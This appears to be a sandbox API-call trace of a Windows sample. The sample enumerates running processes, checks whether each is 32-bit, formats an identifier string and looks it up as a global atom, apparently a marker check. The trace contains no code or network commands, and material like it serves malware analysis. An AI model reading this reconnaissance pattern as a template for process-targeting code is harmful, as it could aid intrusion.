	[0073.721] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.721] CloseHandle (hObject=0x224) returned 1
	[0073.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.721] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.721] CloseHandle (hObject=0x224) returned 1
	[0073.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.721] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.721] CloseHandle (hObject=0x224) returned 1
	[0073.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.721] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.721] CloseHandle (hObject=0x224) returned 1
	[0073.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea40, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.721] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.721] CloseHandle (hObject=0x224) returned 1
	[0073.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.722] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.722] CloseHandle (hObject=0x224) returned 1
	[0073.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.722] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.722] CloseHandle (hObject=0x224) returned 1
	[0073.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a58, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.722] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.722] CloseHandle (hObject=0x224) returned 1
	[0073.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.722] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.722] CloseHandle (hObject=0x224) returned 1
	[0073.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7288f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.723] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.723] CloseHandle (hObject=0x224) returned 1
	[0073.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea40, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.723] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.723] CloseHandle (hObject=0x224) returned 1
	[0073.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eae0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.723] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.723] CloseHandle (hObject=0x224) returned 1
	[0073.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.723] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetLastError () returned 0x5
	[0073.724] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.725] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.725] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.725] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.726] GetLastError () returned 0x5
	[0073.727] GetLastError () returned 0x5
	[0073.727] GetLastError () returned 0x5
	[0073.727] GetLastError () returned 0x5
	[0073.727] GetLastError () returned 0x5
	[0073.727] GetLastError () returned 0x5
	[0073.727] GetLastError () returned 0x5
	[0073.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.727] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.727] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.727] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.727] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.727] CloseHandle (hObject=0x224) returned 1
	[0073.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.727] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.727] CloseHandle (hObject=0x224) returned 1
	[0073.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e6a8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.728] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.728] CloseHandle (hObject=0x224) returned 1
	[0073.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.765] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.769] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.769] CloseHandle (hObject=0x224) returned 1
	[0073.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728978, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.770] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.770] CloseHandle (hObject=0x224) returned 1
	[0073.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728818, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.770] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.770] CloseHandle (hObject=0x224) returned 1
	[0073.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.770] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.770] CloseHandle (hObject=0x224) returned 1
	[0073.770] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.771] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.771] CloseHandle (hObject=0x224) returned 1
